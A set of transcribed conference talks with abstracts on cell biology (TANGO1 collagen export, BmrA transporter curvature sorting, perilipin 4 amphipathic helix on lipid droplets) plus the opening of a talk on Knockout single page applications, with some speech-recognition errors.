that tango, whether it's a homomer or a heteromer, tango C-Tage-5. Because this is what creates the... Okay, fine. So we say that it forms a filament. So it's a filament in the membrane. Now, the filament wets the edges of the cop-2 coats. So it acts literally as a line-actant, and by doing so, what it's doing is it's controlling the dimensions. So ordinarily what you would have is the filament will bind or will wet the rims of the cop-2 coats and therefore contain cop-2 coats in the middle. Now, if you want to make a bigger structure, what we are saying is that these filaments can fuse with other filaments in the vicinity and you end up getting a bigger structure. Okay? Now, how do we know that? So in order for tango to form a ring, it has cop-2 in the middle, so there are interactions of tango to cop-2 components as shown here with these lines. And we know that this is through prolinege domain, and this is in sec-23 coats. So if you now knock down cop-2, you can do it two ways, right? You can express a tango that doesn't have a prolinege domain, or you can remove sec-23, and you come to the same conclusion. What happens is you don't form rings. What you end up getting is a structure that is highly tessellated. So basically what we have done is we've reduced the interaction of prolinege domain to the cop-2 coats, but the lateral interactions which we think are being mediated by tango interacting with itself and tango interacting with c-tage-5 and tango interacting with tango-short. And in doing so, you end up getting these highly tessellated structures. Now, this is just to show you another example that if we now affect the cop-2 interaction, in this case we have expressed tango-1 without the prolinege domain, but you end up getting these sort of long stringy elements. There are little rings sometimes, but the rings seem to be fused, and it is depicted in this pictorial form here. So I think what this is allowing us to test is finally, I'm not going to go through the whole process. So if you, for example, remove the ability of tango to bind the collagens, it's a complete block and ring assembly. So it appears that the binding of the cargo-2 tango and the binding of tango-2 itself and its associates is the process that is absolutely necessary to generate these structures. And this is the direction that we are going into try to understand how this structure is assembled at the ER. That's about it. I think I'm done. I'm going to stop here and gladly answer any questions. Thank you very much. I wonder what happens at the transcology, more downstream? Do you think any special mechanism will operate there? Well, we've tried very, very hard. All the tango-like particles that we found for exports of chylomicrons and a completely new one for nuisance, they all seem to be at the ER, there's nothing at the level of the Golgi. So my feeling is once you leave the ER, you don't need to sort these elements again. The structure that contains these big particles simply keeps moving forward. So there isn't a need to resort them into specific vesicles. This is a simplest answer. I mean, there might be other components that do it, but we haven't found it. And to be quite honest with you, I think if we could just solve at the level of the ER, I think that would do it for me. So in terms of the force and the movement of the collagen, isn't this reminiscent of the translocation of unfolded peptides across the ER and the HSBs? And tango can somehow provide some force that will... So you're right. Yeah, you're right. So there is the unstructured part. And when you do an IP of tango, so we can purify tango. In fact, David is sitting here. We can now express tango in Pichia pastores. It's taken us a long time. We're trying to engineer to answer some of these questions to see if we can express tango in Pichia and what does it do? So we can express it. It took almost three years. It goes and forms a ring around cop two coats. That's all we can do thus far. Ultimately, I would like to be able to see if we can secrete collagen. So we're doing bioengineering in a way. When we look at the components that bind to tango in the lumen, they seem to be collagen and collagen like molecules and chaperones. They bind to a lot of chaperones. So we think it is not just HSB 47 and that's it. They are switching chaperones. When they switch these chaperones, we don't know. We would like to be able to test when do these chaperones come into play at what stage. But it has not been that particularly easy. So we can knock down these chaperones and we see an effect. But that doesn't give us the mechanism. So we are trying to figure out in vitro, I don't think we'll be able to do it. That's why we went into Pichia pastores. We are doing that with Ben Glick. But yeah, I mean, what you're saying, it's reminiscent of creating a translocom type structure, which is using tango and its force to move. We're also looking for an ATPase in the lumen of the ER to help perform this function. Yeah, they should be doing it, but still you need ATPase. Yeah, Tommy. I might have missed it, but what do you think about the dissociation of the collagen from the chaperone? Like after the pushing, do you need to best... Well, there are two ways of doing it. One is you make life very difficult and you invoke another protein. The alternative is very simple. The binding of SS3-like domains to their targets is weak affinity, very weak affinity. So if a molecule, which is about 900 amino acids, about over 1,000 amino acids, 900 are unstructured, one possibility is that it can only extend up to this distance. It cannot go like so and therefore dissociate. It's simply conformational change. And then... So going back to the translocom model, the pulse is constant. And then, anyway, from your pictures, it looks like it's on a translocation through some sort of a core. Actually, when we started to work on pathology many, many years ago, was to synchronize the folding of prokolog and indian-nupasana reticulum. This allowed us to generate large aggregates, indian-nupasana reticulum, very large, one micron by one micron. So when you release the block of secretion, it's the complicated to explain now, although they're so big, they go out easily. How does that fit with your models? Certainly not with a simple translocom through a core, because that would have to be huge. Well, why not? I mean, the thing is that, you know, we're not saying that this is translocon as in the sense of a 9 nanometer pore. This might be much bigger. I don't know, we should do it in chondrocytes the way that you guys did it, where you accumulate so much collagen and then you release it all in one shot. We haven't done that because, as is, they are so big to get them out. I expect that when you have such a massive efflux, there must be major reorganization. It would be terrific to know what happens to the ER exit site. We haven't looked at that, but it would be worth doing it. I had a question myself. So, basically on your model, where you think that to enlarge this kind of carrier, you need fusion of all this molecules. So, to get fusion and to get this increase of area, you need to have a barrier somewhere. Otherwise, you will... So, basically, it means that... Ring is the barrier....is the barrier, right? Yes, the barrier. Call it a fence, call it a fence, call it a ring. But this is the... This is the ring. The tongue goes to the barrier, right? So, I can also show you images of basically the organization of the poorly enriched domains, etc. So, they all seem to be... Ordinarily, tango starts off like this, and then it opens like this as the tunnel is growing. And it just remains here, and then it keeps moving down. So, we have all of those images. But those are images. We'd like to be able to do more than that. But I think what you're doing is you're making a fence, a line, and everything happens within that area, and this restricts, and then you're... So much you can... Yeah. That was to me... Tom... Maybe here. Mark. Quick question. So, Misha Rappa has found that the cop... One of the cop proteins, or several of the cop proteins, needs to be ubiquitin-modified in order to package collagen. Where does that fit into this story? How does that... Do you incorporate that at all, or just get it all? I mean, I was in Randy's lab for six months, two years ago, and I basically... We don't see that. They basically say that KLHL-12 is ubiquitin-hitting, Sec 31. But where? It's six years ago that paper was published, right? I would like to know where that thing is getting ubiquitinated, and there's a paper that's going to come out. Shortly, it's not my paper where the authors of this new paper claim that this whole KLHL pathway... It's found on containers that contain cop 2, but they're not going to the Golgi. They're going to Lysosomes for degradation. So, we had not seen any effect of KLHL-12, etc., etc., in our pathway. We don't see its role in secretion, but I don't want to just... I just decided not to go there. Very quick question. So, back to this model, the connection between the R-Degolgi. If you're getting lots of collagens trying to come out from all the ER exit sites, most of them should be constipated. Who should constipate? The ER should become constipated, because only there are a few limited number of regions where the Golgi is in contact with the ER. So, most of the sites would be not associated with Golgi. So, all those sites should be constipated, and you should have all the collagens stuck if there would be a conduct kind of approach. But is there any evidence that you need to give some losing things? That's why I didn't go into medicine, because I just don't think I could answer that. I really don't know. I mean, I think I'm just basically presenting you what I think... What I don't have is not there. I mean, there are lots of questions that one could challenge. I mean, there's a recent paper from Maria Leptin's lab that a protein called dumpy, which is the largest protein known to anyone. It's dumpy. It's in flies, Drosophila. It is even bigger than collagen, and it requires tango one, Drosophila tango one, for its exit from the ER. So, you know, this is where most of the work is going to go. People are going to say, this cargo also requires tango, et cetera, et cetera, et cetera. The difficult questions are, in my opinion, whether there is a tunnel, or whether there really is a sort of transport carrier. Number two, the directionality. Somebody, you know, Eve said, you know, how do you move it in that direction? I think this is very crucial. And then this business of how do you control how much collagen goes out, because it depends on the type. So, we think when there is small amount of collagen, you have rings of about 300 nanometers. And you need to export even bigger, as you say, than what happens is these rings have the capacity to... It's like a fence. It fuses to the fence on the side, and what you do is you create a bigger structure. And so, you can push even more out. But those things at the microscopy level are very difficult. And at the biochemical level, all you're looking for are increase in the number of molecules. And this is not at the surface. We're looking at something that happens inside the cell, which makes it a little difficult, I think. But so, I think in my opinion, these are the two or three questions that we are trying to address. And we thought of doing everything in vitro. We were able to purify a tango wand, but it collapses. So, it's very, very hard to work with. That's why we decided to go into PICCIA. And then we are trying to create in a PICCIA the ability to express. So, we can do it with tango wand. That's no problem. Will they generate bones? Will they generate bones? I don't know, but we are... So, there are four minimum... You need four proteins. That's a must. No, no, no, no. I'm not trying to make a bony yeast. But what I'm trying to do is I'm trying to ask, can we get collagen to leave the ER with the following set of proteins? Three enzymes, collagen type four, which is the easiest collagen to work with, and tango. That's all we care. What happens once it comes out, whether it goes to the Golgi and hug gets sorted, it's someone else's business. I think this would be sufficient. So, that's where we go. Thank you very much. Thank you.
|
Secreted collagens compose 25% of our dry body weight and necessary for tissue organization, and skin and bone formation. But how are these bulky cargoes that are too big to fit into a conventional COPII vesicle exported from the ER? Our discovery of TANGO1 (Bard, Nature 2006; Saito, Cell 2009; Saito, Mol Biol Cell 2011; Santos, J Cell Biol 2016; Malhotra, Ann Rev Cell Dev Biol 2019), a ubiquitously expressed, ER-exit-site-resident, transmembrane protein has made the pathway of collagen secretion amenable to molecular analysis. TANGO1 acts as a scaffold to connect collagens in the lumen to COPII coats on the cytoplasmic side of ER. However, the growth of the collagen containing mega transport carrier is not simply by accretion of a larger COPII coated patch of ER membrane, but instead by rapid addition of premadesmall vesicles. This mode of transport carrier formation is fundamentally different from that used to produce small COPII vesicles. We have seen that TANGO1 rings the ER exit site and thus organizies a sub compartment within the ER (Nogueira, eLife 2014; Santos, eLife 2015; Raote, J Cell Biol 2017). We have now mapped all the components that work in concert along with the cargo to assemble TANGO1 into a ring (Raote et al., 2018. In review). Mathematical modelling, biochemistry and super resolution microscopy based analyses of this process will be discussed. TANGO1-family proteins (cyan) assembly into a ring at an ERES is mediated by interactions 1. with COPII (orange) 2. with triple helical collagen (purple),3.amongst the TANGO1 family proteins 4. with the NRZ tether (dark blue) which links TANGO1 to ERGIC membranes. TANGO1 acts as a lineactant, delaying the binding of the outer COPII coat and allowing for the formation of a mega-carrier.
|
10.5446/50910 (DOI)
|
Thanks for selecting me for a short talk. I'm a post-doc researcher in Institute Curie working with Patricia Becero. I'm working in a collaboration with Daniel Levy and Maxim Dom from Institute Curie. I'm going to introduce you my ongoing work on conformational dynamics related distribution on membrane. It's a cross talk between conformational dynamic of transmembrane protein and biophysical properties of the membrane such as curvature or tensors. As we all know that cell membranes are two-dimensional pseudo-seat in which transmembrane proteins are embedded or peripheral membrane proteins. Some are transmembrane proteins such as ABC transporters are the measure class of among the measure class of the transporters involved in transporter activity, lipid flip-ins activity. Especially they are involved in a multi-drug resistance in a cancer cell, especially also they are resistant to the bacterial cell. I'm working with the bacterial ABC transporter which has open conformation. ATP-driven conformational change induces or exports the drug which has open conformation. ATP binds, closes and then the drug translocated outside the cell. So it has two shape, one is a conical, one is a cylindrical. What happens when protein goes in the conformational dynamics inside the membrane? It means that the transmembrane part motion is conveyed to my bilayer. So bilayer curvature is also changing upon dynamics. So what happens or what is a cross talk when the conformation changes happening to the group membrane and what happens when we have a certain membrane biophysical fixed parameter to the conformational dynamics. So it's a both cross talks. Recently in Daniel Levy group has shown that the open conformation which is a conical has a spherical arrangement. They form ring like structure whereas when you inhibit by ortho vanadate cycle get arrested ATP cycle and you have a cylinder shape protein you usually end up getting a ribbon like structure. So what happens here that whenever there is a protein inclusion which has a curvature in a conical shape you have a membrane strain whereas when the protein is having a cylindrical shape which has no curvature they have no curvature membrane strain. Usually so the conformational change from conical cylindrical and I'm going to talk what is on the effect of the membrane. To study so bit about the physics membrane is a flat membrane you can have a bending you can define the bending of the membrane. When you have insertion of the protein then this spontaneous curvature induced by the protein comes into the play and this bending energy you can reduce as effective spontaneous curvature of protein is derived the recruitment of the protein in the curved surface to minimize the bending energy of the membrane and that's dependent on that's how the curved protein try to enrich into the curved membrane and that's derived the membrane curvature the protein shortings of the curved molecules like conical transmembrane proteins or helical insertions. Our lab developed a tool to study how we can play around the membrane curvature and protein sorting. We grow a giant enololour vesicles this is a minimal in vitro reconstituted systems in purified minimal components where you have lipid membrane you reconstitute your protein and you pull the tube nanotube with the optical tweezer and you can play around you have the almost flat surface you have a curved surface you can go from 100 nanometer to 10 nanometer you can control the membrane tensons you can play around with the force. So this is a very good system and we can calculate the protein enrichment from flat to the curved surface. Our lab has shown that the KBAP which is a conical shape has a preference for the curved surface whereas the equiporin which is a cylindrical in shape doesn't have any preference for the flat or curved surface. But what happens that the protein has the both shape conical and it's going in a dynamic state so I'm going to take open conformation, closed conformation and in dynamic state let's see what happens. But first I need to reconstitute my protein we reconstituted open conformation this is the most challenging task and then we reconstituted the closed conformation. I want to remind here that when we do the reconstitutions by electro formation we usually having a both leaflet or symmetric reconstitutions of the protein in both case so I'm going to use this system symmetric reconstituted system. Let's talk about the closed conformation which we got it in presence of ortho vanadette this is the fixed conformation we reconstituted this protein. We pull the tube and we started increasing the tension you can see from the movie. When we increase the tension we modulate the radius and as we modulate the radius you can see here that the protein is sorting there is no protein as you increasing the tension you are modulating decreasing the radius and then the protein sorting is started. So relative enrichment calculated and then the radius we calculated from the fluorescence we can't calculate directly from the tension there is a relation from tension to the radius but we have the proteins of the correlation doesn't go very well and we plotted our protein enrichment versus curvature and it depend on the protein density on the surface first and also it protein enrichment has a curvature preference around 20 nanometer here. So lesser the protein density on the surface easier to flow through the neck so we have almost protein is flowing from flat surface to the curved surface lipid is flowing from outside so there is a mixing and this allows the reduction in burning energy due to the spontaneous curvature that follows and after the fitting our curve with the model we deduced the curvature of the protein around inverse of 6 nanometer. Initially we presume that the protein is cylindrical but it is not cylindrical it has a spontaneous curvature and this goes well with the crystallite structure of the other ABC transporter and so here what we propose is that the protein which are inside out are sorting out into the tube which has a preferred curvature from the inside. Let us take an example of the open conformation here I am not I pull the tube and I waited for 15 minute I am not changing any tension I am not modulating my radius protein itself modulating it sorts it reaches to the curved surface when you provide and it remodulate the radius and it reaches up to 30 nanometer so this almost enrichment to the tube is almost 30 time and it automatically modulate from 100 nanometer to 30 nanometer always it reaches 30 nanometer you can see here sometime you have huge clusters and phase segregation there might be so here the protein is sorting which are outside to the leaf light here the protein is not sorting from inside and here our curvature for this one is 30 nanometer from the previous cryo E M image they came up with the radius of 15 nanometer so you have to keep in mind that this radius which we are calculating which is this trans membrane domain and interplay of the lipid bilayer this is coming from the extracellular domain also so we have to keep in mind there might be protein-protein interaction we are not ruling out because we have a huge we do not know is it cluster or not and there is a crowding effect because we have almost 50 time enrichment in the tube. Now let us take an example of ATP AVC transporter dynamics where in presence of ATP you can see when it is open there is a one curvature when it is closed then you have another curvature so the sign of the curvature membrane curvature is changing upon the ATP cycling. So in this experiment what I did it I pulled the tube in open conformation there is a protein enrichment and then I added the ATP on the tube from here and then what we observed that the protein which was enriched in the tube has no they just went back to the flat surface and this is you can see with the and this decreases with the time and then it goes to the study state. So in dynamic state our protein you have to remember that we have a symmetric reconstitution so when I add the ATP only outside molecules are in a dynamic state inside molecules are open always. So and when I add usually this has when they are in the tube outside protein having is in the wrong side it does not have a preferred curvature so they move to the and the good part is it is impossible to check in this giant enamel vascals the activity of the protein so here we we shown that the protein is active first. In conclusion I want to say that the ABC transporter has a dynamic which is the closed conformation has a membrane curvature around inverse of 90 nanometer it has a conical shape it is not a cylindrical shape. Apoform modulates the membrane curvature by itself and it reaches almost to 30 nanometer my protein is active and it is in dynamic state because of the flexibility and negative curvature preference they move out to the surface and this is so BMRA in my experiment with I propose that the BMRA stay longer in a post hydrodetic conformation during the cyclic state and our observation is orthogonal to the rest of the experiments they propose is that the BMRA ABC transporter use will stay in open conformation longer time. Thanks to Patricia Vasero to our groups and the funding agencies and also I want to mention the Daniel who is preparing the proto liposome and also the other collaborator Maxim down. Thank you very much. So what would happen if you drive the ATP hydrolysis inside of the GV by let's say optical methods right and catch ATP. So you are adding the ATP from inside. So one is a technical part when we are okay when I am going to add the ATP inside then the protein which are going to cycle into the inner leaflet of the bilayer in that case they have the wrong preference of the curvature. So usually they will just so in this case if they will start pumping out some there is a physics also there is a they will cluster first that's for sure because there are two not all the protein are going to be synchronized in one conformation. So probably one conformation will derive like population of the conformation will derive to have a cluster. So we will have a two sort of clusters but again it's in a dynamic state. So it's very hard to say what's going to happen frankly. We can have two questions. All right. I like that. Is there any evidence that in the cell you have some sorting based on the conformational state of the protein? Okay in vivo observations there are some of the observations where you have the curved membranes like you have some of the transporters there and they are the curved membranes so they usually but as such there is no direct evidence that the transporter are clustering. It's just a theoretical model proposed in 86 and that says that if the protein are curved they will cluster. So that's a logical conclusion in physics that if they are curved they will cluster. Did you have a question? Oh yeah. So around the same line so what is it the implication for in vivo because there is not what's the density of this protein in normal cells and there will be other normal cells. So what can you think about what's the physiological importance of this if there is an immediate. So when the cell is in dynamic state you have a lot of curved surfaces like whenever the cell is dividing or you have the producer of the cells or so usually I'm not correlating my concentration with the in vivo but the sorting at the curved surface is in sense that it need a transport because this ABC transporter or the lipid flip is also. So they usually would cluster at the neck or the curved membrane and depending on the scenario they want to have export of the molecules or metabolites or anything they will do that functions or even in the curved membrane people propose is that lipid need to be flipped they do these functions properly so this is but I'm not correlating the concentration in vitro with the in vivo.
|
Integral trans-membrane proteins are involved in various cellular functions and their dysfunction is associated with human pathologies [1]. The lipid-protein interactions have been studied to address structure-function relationship of transmembrane proteins at molecular level. However, the effects related to membranes physical properties on trans-membrane proteins have not been well-studied, and not at all when their conformations change. Recent experimental evidence indicates the intrinsic interplay between protein shape and the properties of its membrane environment [2,3]. It is expected that non-cylindrical proteins tend to cluster and be enriched in curved membranes. Thus, we studied BmrA a bacterial ATP binding cassette (ABC) transporter from B. subtilisinvolved in export of a large diversity of substrates in an ATP dependent manner, fairly homologous to human P-glycoprotein ,[4]. The conformational change in nucleotide-binding domains (NBDs) of BmrA between apo and the post-hydrolytic state (tweezers-like motion) is 5 nm and that is the largest tweezers motion reported till date in the case of trans-membrane proteins. Here we addressed how the conformational dynamics of BmrA influence its membrane properties, in particular its spatial distribution on flat or curved membranes. To decipher the effect of the conformational dynamics of BmrA on its spatial distribution in membranes, depending on membrane curvature, we used cell-sized giant unilamellar vesicles (GUVs) containing either the apo-or closed-conformation BmrA to form membrane nanotubes with controlled radii. We found that, at low protein density, apo-BmrA is highly enriched (50 times) in nanotubes as compared to flat membrane and simultaneously modulates tube radius from 100 nm to 30 nm, due to its high intrinsic curvature. Surprisingly, although the post-hydrolytic closed-conformation BmrA is expected to be cylindrical, we measured an enrichment of this conformation in nanotubes, but about 3 time less pronounced then for apo-BmrA. Eventually, in the presence of ATP, BmrAhas reduced curvature selectivity as compared to the apo form, in agreement with a cycling change of conformation between the apo and the closed forms. This study on reconstituted transmembrane proteins demonstrates that protein distribution on membranes is influenced by the interplayof membrane curvature, effective shape and flexibility of membrane proteins.
|
10.5446/50911 (DOI)
|
So actually I'm going to talk about lipid droplets which are very peculiar organelles in the cells because they are an organelle that is not surrounded by a membrane but instead by a phospholipid monolayer. And a lot of proteins have to localize to lipid droplets and a lot of them use an enthalpy helix to target lipid droplets. So what you want to understand is why a protein goes to lipid droplets not to another organelle that is surrounded by a bilayer. And so in order to answer this question, so I started looking at this protein family called the perilipins which are really like hallmark mammalian lipid droplet proteins. So there is three perilipins that have been studied a lot, they localize to lipid droplets and all of them they contain in their sequence a predicted enthalpy helix region. But there's another protein in the family that's really striking. So it's called perilipin 4. It hasn't been studied very much but this one has a predicted enthalpy helix region of almost 1000 amino acids in the human sequence. So it seemed like a really good candidate to study targeting to lipid droplets by an enthalpy helix. And so not only is it very long, but it's also extremely repetitive. So the sequence is composed of these 33-may repeats and in the human version you can identify about 29 repeats. And here like I'm showing your plots, so this is an alignment of the repeats from the human protein. So you can see how in many positions of the repeats you always have the same amino acid. And so that when you plot this one repeat on a helical wheel you can see that it could form an enthalpy helix. So it has a hydrophobic side and it has a polar side. And actually it's not a very, so you can see that the hydrophobic side is not very strong so you don't have any large hydrophobic residues. And we can purify these peptides and look at them, they are structured by a CD spectroscopy. And when you look at the protein in solution it really has this typical signature unfolded motif. But then when we increase the concentration of lipids in this mixture we get a really nice helical signature. And this is over 400 amino acids. Actually we have gone up to 660 amino acids. So it's really by far the longest consecutive enthalpy helix, not enthalpy helix, any helix that we know of. So what you're saying is that it doesn't have any good structure. No, it's completely unfolded in solution. And actually this is how we purify it. Right. So then we can ask okay does it go to lipid droplets? And so we express this protein in Hila cells fused to M-cherry. And you can see that there's a lot of cytosolic signal. But then it also surrounds lipid droplets that are here labeled in green. And the localization to lipid droplets really depends on the length of the protein. So if we have a short sequence of like 233 mps or 66 amino acids it doesn't go to lipid droplets. But as we increase the length the targeting to lipid droplets becomes really efficient. So then we can also look at the sequence of the helix to see what are the parameters that are important for targeting. And as I've told you so it's really not a very hydrophobic helix. But it has a lot of threonine for example. So the first thing I wanted to ask is like how does hydrophobicity affect targeting? So because if you imagine so this is a helix that should interact with lipids over a long interaction surface. So we don't want to make big mutations but instead we make small mutations and repeat them along the length of the helix. So here for example I'm mutating threonines into valines or serines that are either a little bit more or a little bit less hydrophobic. And if you increase the hydrophobicity just by a little bit now the helix starts to localize very efficiently to lipid droplets. Whereas if you decrease it by mutating threonine into serine you lose all lipid droplets targeting. And then another thing happens. So if it's more hydrophobic it goes to lipid droplets better. But you can see also that the cellular pool of the helix changes. And in fact we can see like if it's more hydrophobic it starts to invade very efficiently other cellular membranes. So here in a cell that is expressing the protein more highly you can see very strong endoplasmic reticulum signal but probably goes to all sorts of membranes. Whereas where you have low level expression you see primarily lipid droplets. So from this we can conclude that both length and hydrophobicity improve binding to lipid droplets. But in fact if you're more hydrophobic then you lose specificity you become more miscarried for other membranes. So there's something about the surface of lipid droplets that make them really sticky so that empathy helix can bind very easily. So we wanted to understand what is that. So for that we'll do experiments in vitro with purified protein. So we can label the protein with MBD so that it's fluorescent and the fluorescence depends on whether it's in a hydrophobic environment. And test how it binds to bilayer liposomes. So we have prepared liposomes of where we vary composition. For example we increase the monosaturation of phospholipids which interferes with packing of phospholipids. We increase the charge. We increase curvature. We add the diacylglycerol. And actually the white-tap empathy helix really doesn't want to bind to bilayers. Whereas if we use this mutant that has morphine to hobic now we have very promiscuous binding to all sorts of liposomes. And in fact there was only one composition that we could find for the liposomes that was efficient to recruit this empathy helix. And this is an artificial acyl chain that you can buy like in phospholipid that contain mayhem groups. So you have methyl group every four carbons. So you can see here this is this D-fetanol. So these methyl groups prevent like efficient packing of phospholipids. So again you get a surface that is not very well packed. And so this surface is good for binding of our empathy helix. But obviously what does that have to do with lipid droplets? So one thing that I've told you about lipid droplets so they don't have a bilayer they have a monolayer. So unlike a bilayer, so in bilayer you have the two leaflets coupled. Whereas here like the monolayer can spread. So the phospholipids can spread on the surface and this will increase the surface tension of the lipid droplet. So such lipid droplets are going to become unstable and they will fuse. So we thought that maybe this characteristic of the lipid droplet would be important for targeting the empathy helix. So for this we do like we decided to do an extreme case experiment. So let's imagine that we have only neutral lipids and we don't have any phospholipids. What will happen? So it's a very crude simple experiment. So we have a solution of protein. We add the droplet of oil. We vortex really hard. And as you can see as you as you increase the concentration of protein in the solution you get after vortexing you get increased turbidity. And if we put this mixture on under electromicroscope you can see that small droplets, small old droplets have formed. And you can also look at them by dynamic light scattering and they have quite uniform size so in the range of a few hundred nanometers. And if we use this in the experiment this mutant protein that didn't go to lipid droplets in the cells now we don't see any formation of droplets by dynamic light scattering. And also we can label the protein fluorescently and look under fluorescent microscope and you can see in the bigger droplets that you have the protein fluorescent protein very nicely surrounding the core of the neutral lipid core. And so it looks like this. Empathy helix can in fact replace the phospholipids. So it's acting like an emulsifier in place of phospholipids. So obviously this is a very artificial in vitro experiments so we wanted to see like if there's evidence for any evidence for that in the cell. So for this we use the drosophila cells because drosophila has been used a lot in screens to determine protein factors that are important for regulating the size or distribution of lipid droplets. And one protein that came out of these screens is this protein called CCT1 which is an enzyme that is catalyzing the rate limiting step in the synthesis of phosphatidylcholine. So the phenotype that you get when you deplete the CCT1 is that lipid droplets get bigger. And so the explanation for that is that because you don't have enough phospholipids the lipid droplets are fusing. So if Empathy helix can do the same thing as phospholipids that means that we should be able to rescue the size of the lipid droplets under these conditions. And this is indeed what we see in the experiments of here. I'm showing the experiment where we deplete CCT1 and you can see that in the cells that are not expressing the protein the lipid droplets get very big. But when we have the protein expressed the size of the lipid droplets is rescued which you can see quantified here compared to the control experiment. So from this we conclude that the spellipine 4 is an Empathy helix that is really optimized for interacting with neutral lipids over a long surface and it can act as a coat to form these droplets. And so this could be important in the cell under conditions for example when you don't have enough phospholipids you could quickly snip on the protein to stabilize the lipid droplets. So I like to imagine this protein like as a millipint because you have lots of legs and interacts weekly with the surface but actually I'm just going to show you one piece of data that this millipad model is really not very good because so if you go back to this mutational analysis so one thing I didn't talk about is the charge of Empathy helix. So in the polar side of the helix you have quite a lot of charge residues. So actually throughout the sequence you have the net charge is always plus one. So I tried mutating this charge like mutating residues to get to reverse the charge or to increase the charge. In all cases we decrease the binding to lipid droplets. But one strange thing is also that the charge is always asymmetrically distributed which is kind of unusual because if you want to interact with the surface you would want to have charge close to the surface. So this is the case that I'm showing you here. So we ask like what will happen if we keep the composition the same but we kind of redistribute the M&S to make them as symmetrical as possible. So in this case we also decrease the binding of the protein to lipid droplets. But we can also express these proteins in yeast which I'm very happy about because I'm yeast person by heart. So in yeast also it goes to lipid droplets so these targeting mechanisms are very conserved but actually it goes to the plasma membrane quite efficiently. And so if we compare the targeting of this wild type protein and the protein that has this charge swapped we can change the ratio between plasma membrane and lipid droplets signal which would correlate with the distribution of charge. And so we propose that in this case in the protein actually the charge is mediating inter helical interactions to kind of form a mesh work on the surface of the lipid droplets to stabilize them. So I worked as a researcher in the lab of Cathy Jackson and so I have shown you work of three people. So Manuel is a PhD student and two engineers have done a lot of the experiments that I have shown you and we have done this work in collaboration with the group of Bruno and Tony so all the liposome experiments that I have shown you and the CD spectroscopy has been done by Bruno and Marco Mani. And thank you very much for your attention. So you mentioned the changes in droplet size as a consequence of either phospholipid metabolism or the thin expression. Are there changes to the metabolism of neutral lipids in these droplets? Do you see changes in I mean cluster hydrolysis for example are very nonspecific in some way? Is there a rate of cholesterol? So you mean when we have the enfaticulix present? We haven't done these experiments. We have looked a little bit if the composition would affect targeting and we see some differences but yeah we don't know. What do you think is the function in the cell of these lipid droplets? I mean I know that there are I think that they know that they like inside they have many lipids that maybe are sequestered but what is the function of having proteins outside? Is this like a parking club for proteins that are supposed to be in membranes? So they're really important lipid droplets for lipid metabolism. So one thing is like if you have too many so for example fatty acids are toxic so you need to store them into triglycerides to get them into and then when you need energy you recruit lipases that degrade the triglycerides and the esters. What is the function of the some proteins getting between them and membranes? Of the proteins which are on the lipid membrane? So you have a lot of enzymes and then these perlipins for example they don't have enzymatic activity so they have been proposed to act like as a I mean they can recruit other for the perlipin one for example recruits lightases so they should regulate. So in both metabolism I noticed there are Tic Protis 7 it's also supposedly has a role in protein trafficking so is the why is it in both places do you have I mean why are proteins in both places? Which are not lipid metabolism? The role of Tic Protis 7 in trafficking is a little bit under question. So it was originally proposed to be involved in trafficking but actually it seems to localize really well on lipid droplets and so all the function correlates with. Maybe it's not contradictory maybe it's just as I said parking lot for. Yeah but actually I mean lipid droplets are really like connected with I mean so they are connected within the plasma curriculum they have a lot of contact sites with other organelles so they're really like an integral part of the cells you have a lot of trafficking through the lipid droplets to the organelles. So maybe I missed it in what you said but do you have a mechanism observed or in mind whereby then the lipid droplets are some say you get rid of the. So how do you get the protein off? Yeah because yeah. We don't know so one thing one speculation would be that like you can imagine by phosphorylation because we know that if when the charge changes like it doesn't bind and it has all these three are in serine so you could imagine that if you phosphorylated you could very quickly take it off but that's completely speculation we have no evidence for that. Is there a differentiation among lipid droplets? Are they looking to sell different kinds of different compositions different contact sites perhaps? So it's something that's very like under study so there are some so for example there is some there are some suggestions in literature that you have difference in the composition at least in some cell types you seem to have the difference in the composition of the core of lipid droplets and that some perillipines prefer like cores with more triglycerides the other one with cholesterol esters. We have tested this a little bit in yeast and we don't see a difference and then there also you have some lipid droplets for example that are in close contact with peroxysomes or like more in contact with endoplasmic reticulus and there seems to be like some specialization but this is not very well understood but it's very studied a lot. Alright so thank you very much.
|
Lipid droplets (LDs) are dynamic organelles that play an essential role in cellular lipid homeostasis and are implicated in many human pathologies (obesity, diabetes, cancer, etc.); however, the mechanisms of selective protein targeting to LDs to mediate their function are poorly understood. Many LD proteins interact with LDs via amphipathic helices (AHs), which can mediate direct and reversible binding to lipid surfaces, and are also present in numerous non-LD proteins. We use a uniquely long and monotonous AH, found in the mammalian LD protein perilipin 4, to probe the physico-chemical properties of the LD surface. We show that this AH is unstructured in solution but can adopt a highly helical conformation, over a length of hundreds of amino acids, when in contact with a lipid surface.The regularity of its amino acid sequence allows us to introduce subtle mutations that are repeated along the length of the helix in order to dissect he parameters that are important for AH targeting to cellular LDs. By this mutagenic approach, we show that LDs are relatively permissive for AH binding, suggesting a surface with abundant lipid packing defects, in agreement with predicted behavior of a phospholipid monolayer on a neutral lipid core (Bacle et al., 2017, Biophys J, 112:1417). We show that AH length, hydrophobicity and charge all contribute to LD binding. However, a small increase in the hydrophobicity of AHs that leads to improved LD localization also makes them more promiscuous for binding to other cellular compartments. These results suggest that the physico-chemistry of the perilipin 4 AH is exquisitely tuned to be specific for LDs. In vitro, we find that purified wild-type AH binds poorly to bilayer membranes. In contrast, it can interact efficiently with neutral lipids and is capable of forming small uniformly coated oil droplets. Accordingly, overexpression of this AH in cells overcomes a decrease in LD stability associated with phospholipid depletion. We propose that by substituting for the phospholipid monolayer, perilipin 4 may be important for stabilization of LDs when phospholipids are limiting, for example during periods of LD growth.
|
10.5446/50870 (DOI)
|
All right then. I think I'll just kick off now. Is that okay? Yeah, ready to start? All right then. So, hello and thank you. Let me start my timer. Thank you for coming to this session. It's really great to see you all. Obviously, it's kind of weird looking up like that at you all, but I will try and maintain good eye contact and be a good presenter in this talk. My name is Steve and I, what do I do? I work for Microsoft. I work on lots of different web stuff for them and I started off this knockout project a few years ago and so that's why this subject matters to me. I work on single page applications. I've got a special interest in knockout, so it matters to me and I think it probably matters to a lot of people actually, the whole single page applications thing because maybe four years ago when we started knockout, people were not really building such massive single page applications. Typically, people were using knockout to do just a little bit of interactivity on a bigger page and that was quite straightforward and knockout solved that problem really well, but things have moved on enormously in a few years since then and now people are building these huge applications that stay in the screen for hours potentially as the user is navigating down around loads of different things without doing any server side page navigation and that presents a load of new challenges and I don't think that we've necessarily provided all that much in the way of examples and docs and such that cover those kind of scenarios. So hopefully I'm going to redress that balance a little bit today. Now then, I should warn you before we get started that sometimes people have said that my presentation style is a little bit like this to the audience and to be honest that's probably fair. It might well feel a bit like this from 